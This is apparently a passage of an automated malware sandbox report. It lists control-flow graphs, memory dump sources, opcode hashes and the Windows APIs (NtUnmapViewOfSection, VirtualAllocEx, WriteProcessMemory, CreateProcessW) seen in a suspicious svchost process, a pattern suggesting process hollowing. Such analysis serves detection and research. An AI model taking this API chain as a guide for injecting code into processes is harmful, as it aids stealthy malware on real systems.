7ffb4af8f479-7ffb4af8f4ce call 7ffb4af8afc0 * 2 579->593 594 7ffb4af8f52e-7ffb4af8f539 579->594 580->579 599 7ffb4af8f34a-7ffb4af8f3a0 580->599 581->573 591 7ffb4af8f1ca-7ffb4af8f1cf 581->591 583->576 591->570 593->594 609 7ffb4af8f4d0-7ffb4af8f4f4 593->609 601 7ffb4af8f53b-7ffb4af8f53d 594->601 602 7ffb4af8f53e-7ffb4af8f549 594->602 599->579 603 7ffb4af8f3a2-7ffb4af8f3ed call 7ffb4af8b990 599->603 601->602 603->579 608 7ffb4af8f3ef-7ffb4af8f415 603->608 610 7ffb4af8f4f6-7ffb4af8f506 609->610 611 7ffb4af8f522-7ffb4af8f52d 609->611 610->594 612 7ffb4af8f508-7ffb4af8f51f 610->612 612->611
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: OM_H
                                                                                                                                                                                      • API String ID: 0-3746890205
                                                                                                                                                                                      • Opcode ID: eef6e481cc811a2d84f73c5701e9a7cc8d2e4df1ddb7edad907410e0d1fb661e
                                                                                                                                                                                      • Instruction ID: 7f620826043277ac82ab0d91098249632109fa75dfc57634f2b0f083108dae81
                                                                                                                                                                                      • Opcode Fuzzy Hash: eef6e481cc811a2d84f73c5701e9a7cc8d2e4df1ddb7edad907410e0d1fb661e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D220270A1CB864FD759DF38C4814A5B7E2FF95301B2486BEE486C72D6EA34E846C781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 795 7ffb4af9ca47-7ffb4af9ca49 796 7ffb4af9cac5-7ffb4af9cac9 795->796 797 7ffb4af9ca4b-7ffb4af9ca62 795->797 798 7ffb4af9cb18-7ffb4af9cd7d call 7ffb4af9c9a8 796->798 799 7ffb4af9cacc-7ffb4af9cad9 796->799 801 7ffb4af9ca64-7ffb4af9caaf 797->801 802 7ffb4af9cab0-7ffb4af9cabe 797->802 847 7ffb4af9cdd6-7ffb4af9cdeb 798->847 848 7ffb4af9cdf0 798->848 804 7ffb4af9cb54-7ffb4af9e7e4 VirtualAllocEx 799->804 805 7ffb4af9cadb-7ffb4af9e488 NtUnmapViewOfSection 799->805 801->802 802->796 835 7ffb4af9e7e6 804->835 836 7ffb4af9e7ec-7ffb4af9e809 804->836 826 7ffb4af9e48a 805->826 827 7ffb4af9e490-7ffb4af9e4ac 805->827 826->827 835->836 847->848 850 7ffb4af9ce1e-7ffb4af9ceb8 847->850 848->847 848->850 856 7ffb4af9cfe8-7ffb4af9cffa 850->856 857 7ffb4af9cebe-7ffb4af9cee3 850->857 861 7ffb4af9d1ba-7ffb4af9d1d7 856->861 862 7ffb4af9d000-7ffb4af9d016 856->862 857->856 864 7ffb4af9cee9-7ffb4af9cefd 857->864 862->861 870 7ffb4af9d01c-7ffb4af9d030 862->870 864->856 869 7ffb4af9d1d8-7ffb4af9d2d3 864->869 878 7ffb4af9d4c4-7ffb4af9d4d9 869->878 879 7ffb4af9d2d9-7ffb4af9d405 869->879 870->861 884 7ffb4af9d4e3-7ffb4af9d4ef 878->884 885 7ffb4af9d4db-7ffb4af9d4e2 878->885 879->878 886 7ffb4af9d40b-7ffb4af9d426 879->886 885->884 886->878 888 7ffb4af9d42c-7ffb4af9d43f 886->888 888->878 889 7ffb4af9d445-7ffb4af9d456 888->889 889->878 891 7ffb4af9d458-7ffb4af9d467 889->891 892 7ffb4af9d469-7ffb4af9d474 891->892 893 7ffb4af9d4b2-7ffb4af9d4c3 891->893 892->893 895 7ffb4af9d476-7ffb4af9d4ad call 7ffb4af9a3e0 892->895 895->893
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                                                                      • Opcode ID: 4be203bdffea4006b42d359cdae0e5d407d741db30ecacd110ba4784b025fb69
                                                                                                                                                                                      • Instruction ID: 00bd2e39e454cb971e1a754d7c111ed43283a06f1da5567b4cabb31f5f361ed3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4be203bdffea4006b42d359cdae0e5d407d741db30ecacd110ba4784b025fb69
                                                                                                                                                                                      • Instruction Fuzzy Hash: 93414BF2A0C2598FDB15EF6CE8A62EA7BE8EF41320F1441BBD049C7143E93464478791
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 980 7ffb4af9ca83-7ffb4af9cac9 989 7ffb4af9cb18-7ffb4af9cd7d call 7ffb4af9c9a8 980->989 990 7ffb4af9cacc-7ffb4af9cad9 980->990 1026 7ffb4af9cdd6-7ffb4af9cdeb 989->1026 1027 7ffb4af9cdf0 989->1027 992 7ffb4af9cb54-7ffb4af9e7e4 VirtualAllocEx 990->992 993 7ffb4af9cadb-7ffb4af9e488 NtUnmapViewOfSection 990->993 1015 7ffb4af9e7e6 992->1015 1016 7ffb4af9e7ec-7ffb4af9e809 992->1016 1008 7ffb4af9e48a 993->1008 1009 7ffb4af9e490-7ffb4af9e4ac 993->1009 1008->1009 1015->1016 1026->1027 1029 7ffb4af9ce1e-7ffb4af9ceb8 1026->1029 1027->1026 1027->1029 1035 7ffb4af9cfe8-7ffb4af9cffa 1029->1035 1036 7ffb4af9cebe-7ffb4af9cee3 1029->1036 1040 7ffb4af9d1ba-7ffb4af9d1d7 1035->1040 1041 7ffb4af9d000-7ffb4af9d016 1035->1041 1036->1035 1043 7ffb4af9cee9-7ffb4af9cefd 1036->1043 1041->1040 1049 7ffb4af9d01c-7ffb4af9d030 1041->1049 1043->1035 1048 7ffb4af9d1d8-7ffb4af9d2d3 1043->1048 1057 7ffb4af9d4c4-7ffb4af9d4d9 1048->1057 1058 7ffb4af9d2d9-7ffb4af9d405 1048->1058 1049->1040 1063 7ffb4af9d4e3-7ffb4af9d4ef 1057->1063 1064 7ffb4af9d4db-7ffb4af9d4e2 1057->1064 1058->1057 1065 7ffb4af9d40b-7ffb4af9d426 1058->1065 1064->1063 1065->1057 1067 7ffb4af9d42c-7ffb4af9d43f 1065->1067 1067->1057 1068 7ffb4af9d445-7ffb4af9d456 1067->1068 1068->1057 1070 7ffb4af9d458-7ffb4af9d467 1068->1070 1071 7ffb4af9d469-7ffb4af9d474 1070->1071 1072 7ffb4af9d4b2-7ffb4af9d4c3 1070->1072 1071->1072 1074 7ffb4af9d476-7ffb4af9d4ad call 7ffb4af9a3e0 1071->1074 1074->1072
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 6a097d03313c1e58650d962f844a8d1e3f555144b4f2718fdbab5d24f5257e89
                                                                                                                                                                                      • Instruction ID: f77d9daee0da5db1d98cb154fc0e2994fdacb3e2996f08e7c92fced6f889b107
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a097d03313c1e58650d962f844a8d1e3f555144b4f2718fdbab5d24f5257e89
                                                                                                                                                                                      • Instruction Fuzzy Hash: AD4137B2A0C6498FEB54EF6CD8966E97BE4EF55320F0441BBD049C7143EA34A8078790
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                                                                      • Opcode ID: 3442b3c9ba4ea53efc9c9151f8c4f6b35ddce77916dbcf1a3bc008e33f69c54c
                                                                                                                                                                                      • Instruction ID: 5a59ca5b8271820ac20edf2a957f606ed509bfd7bb92fb4b21dd923e904ba253
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3442b3c9ba4ea53efc9c9151f8c4f6b35ddce77916dbcf1a3bc008e33f69c54c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0521D27190CA4C8FDB58DF6CD88A7E9BBF4EB56320F0441AFD049C3252CA70A456CB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: df8a01356742ba348d5f0f2087ab8a7892976aadec1184fd36b6e438668b0bbe
                                                                                                                                                                                      • Instruction ID: 88f9f693905f84984191e66d6f3ef6b6a4b1d1b4160cdb9e3bcd823af9ceb210
                                                                                                                                                                                      • Opcode Fuzzy Hash: df8a01356742ba348d5f0f2087ab8a7892976aadec1184fd36b6e438668b0bbe
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C52B370A1CA498FDF68EF28D455A79B7E5EF59340B2401BEE44EC72D2DF24AC428781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 04ff29a76e466b69f65291ebde5410bce160296e4596e70fafd07b344c46c15d
                                                                                                                                                                                      • Instruction ID: 4540d8fc5305c9320c5c0f4903de25c28854a5e5d6b3281467c24c724c326496
                                                                                                                                                                                      • Opcode Fuzzy Hash: 04ff29a76e466b69f65291ebde5410bce160296e4596e70fafd07b344c46c15d
                                                                                                                                                                                      • Instruction Fuzzy Hash: B83249A2A1DA864FEB99EF38C856575BBD1EF55310B2801FED48DC71D3DE18E8068381
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 325c7597736e6e255e626f3bc71008215c274340fbc00a5980004d21546e376d
                                                                                                                                                                                      • Instruction ID: e5931046f4fe3fecf7598e238b34741a20b393f48d2e65696db6fb87465df97c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 325c7597736e6e255e626f3bc71008215c274340fbc00a5980004d21546e376d
                                                                                                                                                                                      • Instruction Fuzzy Hash: B9B1757151CB864FE71DDF38C4950B5B7E2EFD2311B2486BED4CAC72E6CA28A4068781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID: WL_H
                                                                                                                                                                                      • API String ID: 4275171209-1262097562
                                                                                                                                                                                      • Opcode ID: 077c2e3a96c1d36fe7a7e4a63c0ea3044021595054f03ebdcae5ad771701221f
                                                                                                                                                                                      • Instruction ID: b2a5d38cbd5dba87d68bdeb0320d6e97154d54a645c90e55a2d778db8aaca94d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 077c2e3a96c1d36fe7a7e4a63c0ea3044021595054f03ebdcae5ad771701221f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9571797190CB498FE719EF38D8965E5BBF4FF95310F1401BED08AC3292DA24A846C782
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 613 7ffb4af8f8f0-7ffb4af8f909 615 7ffb4af8f953-7ffb4af8f97c call 7ffb4af8afc0 613->615 616 7ffb4af8f90b-7ffb4af8f936 613->616 623 7ffb4af8f97e-7ffb4af8f9bd 615->623 624 7ffb4af8f9e1-7ffb4af8fa04 615->624 617 7ffb4af8fa05-7ffb4af8fa17 616->617 618 7ffb4af8f93c-7ffb4af8f94f 616->618 625 7ffb4af8fa59-7ffb4af8fa67 617->625 626 7ffb4af8fa19-7ffb4af8fa27 617->626 618->615 633 7ffb4af8fa2e-7ffb4af8fa3a 623->633 646 7ffb4af8f9bf-7ffb4af8f9c4 623->646 624->617 627 7ffb4af8fbc3-7ffb4af8fbd9 625->627 628 7ffb4af8fa6d-7ffb4af8fa81 625->628 626->633 639 7ffb4af8fbda 627->639 640 7ffb4af8fbdb-7ffb4af8fbef 627->640 631 7ffb4af8fa84-7ffb4af8fabf call 7ffb4af8afc0 * 2 call 7ffb4af8d120 628->631 656 7ffb4af8fad9-7ffb4af8fae4 631->656 657 7ffb4af8fac1-7ffb4af8fad7 631->657 633->631 637 7ffb4af8fa3c-7ffb4af8fa43 633->637 642 7ffb4af8fa45-7ffb4af8fa56 637->642 639->640 648 7ffb4af8fbf1-7ffb4af8fc29 640->648 642->625 646->642 649 7ffb4af8f9c6-7ffb4af8f9e0 646->649 651 7ffb4af8fc2b-7ffb4af8fc3d 648->651 652 7ffb4af8fc3f 648->652 655 7ffb4af8fc44-7ffb4af8fc46 651->655 652->655 659 7ffb4af8fc48-7ffb4af8fc56 655->659 660 7ffb4af8fc5a-7ffb4af8fcd1 655->660 665 7ffb4af8faf6 656->665 666 7ffb4af8fae6-7ffb4af8faf4 656->666 657->656 659->660 683 7ffb4af8fcd7-7ffb4af8fd4f 660->683 684 7ffb4af8fdb8-7ffb4af8fdbf 660->684 667 7ffb4af8faf8-7ffb4af8fafd 665->667 666->667 669 7ffb4af8faff-7ffb4af8fb1e 667->669 670 7ffb4af8fb20-7ffb4af8fb36 667->670 674 7ffb4af8fb63-7ffb4af8fb69 669->674 675 7ffb4af8fb38-7ffb4af8fb49 670->675 676 7ffb4af8fb4a-7ffb4af8fb5f call 7ffb4af8db10 670->676 674->639 679 7ffb4af8fb6b-7ffb4af8fb70 674->679 675->676 676->674 679->648 682 7ffb4af8fb72-7ffb4af8fba0 679->682 682->627 694 7ffb4af8fba2-7ffb4af8fbc2 682->694 699 7ffb4af8fdaf-7ffb4af8fdb7 call 7ffb4af8fe04 683->699 700 7ffb4af8fd51-7ffb4af8fd55 683->700 685 7ffb4af8fddc-7ffb4af8fdec 684->685 686 7ffb4af8fdc1-7ffb4af8fdce 684->686 692 7ffb4af8fdf2-7ffb4af8fe03 685->692 686->685 691 7ffb4af8fdd0-7ffb4af8fdda 686->691 691->685 699->684 703 7ffb4af8fd5c-7ffb4af8fdae 700->703 703->699
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF8A000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af8a000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: DM_H
                                                                                                                                                                                      • API String ID: 0-139757276
                                                                                                                                                                                      • Opcode ID: 43627e5969858ae3eafdf641f6714e35769e83edfa0ba8a3c6c9b106d2677463
                                                                                                                                                                                      • Instruction ID: 284aa774f9989cd4b84350e0e933615de04d3fa0acbc051d41f841c1ea528639
                                                                                                                                                                                      • Opcode Fuzzy Hash: 43627e5969858ae3eafdf641f6714e35769e83edfa0ba8a3c6c9b106d2677463
                                                                                                                                                                                      • Instruction Fuzzy Hash: CC02477160CA894FDB59EF38C4955B9BBE1EF95310B1401FEE48AC72D2DE34A846C781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 778 7ffb4af9e175-7ffb4af9e181 779 7ffb4af9e183 778->779 780 7ffb4af9e185-7ffb4af9e19e 778->780 779->780 781 7ffb4af9e1c5-7ffb4af9e24c 779->781 782 7ffb4af9e1a4-7ffb4af9e1a8 780->782 783 7ffb4af9e1a0-7ffb4af9e1a2 780->783 787 7ffb4af9e256-7ffb4af9e25b 781->787 788 7ffb4af9e24e-7ffb4af9e253 781->788 784 7ffb4af9e1af-7ffb4af9e1b4 782->784 783->784 784->781 789 7ffb4af9e265-7ffb4af9e287 787->789 790 7ffb4af9e25d-7ffb4af9e262 787->790 788->787 791 7ffb4af9e289-7ffb4af9e28e 789->791 792 7ffb4af9e291-7ffb4af9e2f0 CreateProcessW 789->792 790->789 791->792 793 7ffb4af9e2f8-7ffb4af9e325 792->793 794 7ffb4af9e2f2 792->794 794->793
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: cadf5f9aba9fa8843c36af4e99af81bcfd4a5262ab8eb90d0cefa4b1e9f271d1
                                                                                                                                                                                      • Instruction ID: 727fd5440a1cc09de4afc695c52ad36257004b56e8f108f6e816ec938051bd15
                                                                                                                                                                                      • Opcode Fuzzy Hash: cadf5f9aba9fa8843c36af4e99af81bcfd4a5262ab8eb90d0cefa4b1e9f271d1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3751E17180CB4C8FDB59DF6CD4546AABBF0EB99310F1442AFE489D3291DB34A8458B81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 900 7ffb4af9e1b9-7ffb4af9e24c 904 7ffb4af9e256-7ffb4af9e25b 900->904 905 7ffb4af9e24e-7ffb4af9e253 900->905 906 7ffb4af9e265-7ffb4af9e287 904->906 907 7ffb4af9e25d-7ffb4af9e262 904->907 905->904 908 7ffb4af9e289-7ffb4af9e28e 906->908 909 7ffb4af9e291-7ffb4af9e2f0 CreateProcessW 906->909 907->906 908->909 910 7ffb4af9e2f8-7ffb4af9e325 909->910 911 7ffb4af9e2f2 909->911 911->910
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                                      • Opcode ID: 321686a49ced966072ed5e0515a30ecec25eb3855516b32dc54d2b477f7ff0a7
                                                                                                                                                                                      • Instruction ID: f035a0fde19d374f5abcde7027f3b2bc464cdc62bfb769ec56460c15484efde6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 321686a49ced966072ed5e0515a30ecec25eb3855516b32dc54d2b477f7ff0a7
                                                                                                                                                                                      • Instruction Fuzzy Hash: CB51AD7180CB5C8FDB59DF5CD8447A9BBF1EBA9321F0442AFE489D3291DB34A8458B81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1079 7ffb4af8303a-7ffb4af83047 1080 7ffb4af83052-7ffb4af83063 1079->1080 1081 7ffb4af83049-7ffb4af83051 1079->1081 1082 7ffb4af8306e-7ffb4af8311f VirtualProtect 1080->1082 1083 7ffb4af83065-7ffb4af8306d 1080->1083 1081->1080 1087 7ffb4af83121 1082->1087 1088 7ffb4af83127-7ffb4af8314f 1082->1088 1083->1082 1087->1088
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF80000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af80000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                      • Opcode ID: 9efb153da3038bd5ecfcf7a27e5445b55e4c771c07f929c22038b4295aada56c
                                                                                                                                                                                      • Instruction ID: b5ab1516b6334f06b7d75eb7ff28f89514c7a8b25dbc5953ac57f277cc013e8c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9efb153da3038bd5ecfcf7a27e5445b55e4c771c07f929c22038b4295aada56c
                                                                                                                                                                                      • Instruction Fuzzy Hash: FE41F53090CB884FDB19DBA898466E9BFF1EF56321F0402AFD049C31A3CB646456C795
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1089 7ffb4af9e92d-7ffb4af9e9ff WriteProcessMemory 1093 7ffb4af9ea07-7ffb4af9ea31 1089->1093 1094 7ffb4af9ea01 1089->1094 1094->1093
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                                      • Opcode ID: 973d59a901fec97c03e201ffc3ffc4a03d2d84ebd4223ab0b92c59af8a1ad3b6
                                                                                                                                                                                      • Instruction ID: 343f6fec6c85f91aa988251858938a14c8fef08d76be4d1fc24477c43b1528c4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 973d59a901fec97c03e201ffc3ffc4a03d2d84ebd4223ab0b92c59af8a1ad3b6
                                                                                                                                                                                      • Instruction Fuzzy Hash: B631187190CB888FDB19DF5CD8466F97BF5EB9A311F04426FE089C3292CA749846C792
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF99000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF99000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af99000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                                      • Opcode ID: ec95a943122813c0993cbabbea59619b1853cc6675e4dac646baa44417dcc482
                                                                                                                                                                                      • Instruction ID: f33047b69e5e25e1390e6e5df2e638fd9fbaf48e8bdd823d7385eb381a43ea8d
                                                                                                                                                                                      • Opcode Fuzzy Hash: ec95a943122813c0993cbabbea59619b1853cc6675e4dac646baa44417dcc482
                                                                                                                                                                                      • Instruction Fuzzy Hash: F831E27090C64C8FDB58EF6CD8856FABBE4EB65311F0441AFD049C3192DA70A855CB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1981098049.00007FFB4AF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF80000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4af80000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ConsoleFree
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 771614528-0
                                                                                                                                                                                      • Opcode ID: 40e352293348c549cb847f043ef37b1d8f8f8312766f3139040b9fd97dda10c9
                                                                                                                                                                                      • Instruction ID: cb13308d89e1da299588b254200e6fbbe8b9e68f96c85f5212e186a6ccde6045
                                                                                                                                                                                      • Opcode Fuzzy Hash: 40e352293348c549cb847f043ef37b1d8f8f8312766f3139040b9fd97dda10c9
                                                                                                                                                                                      • Instruction Fuzzy Hash: CC21837190CB4C8FDB69DF58D84AAEABBF0EB55310F00416FD049C3652DB756809CB51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000009.00000002.1982421146.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffb4b060000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: A
                                                                                                                                                                                      • API String ID: 0-3554254475
                                                                                                                                                                                      • Opcode ID: f3a4f133a01bdeb18714a1da85d06a218202ec4b1fe3b7fc50407f724d1b68bf
                                                                                                                                                                                      • Instruction ID: 86984bb022bcebd2813e4ccceb5aa60987bec6226bd26d8ac551d63d6ac1555c
                                                                                                                                                                                      • Opcode Fuzzy Hash: f3a4f133a01bdeb18714a1da85d06a218202ec4b1fe3b7fc50407f724d1b68bf
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1281187140CA8A8FDB56EF3CC8956E87BE0FF55305F5445FED149C72A2DA28A846C740
                                                                                                                                                                                      Uniqueness

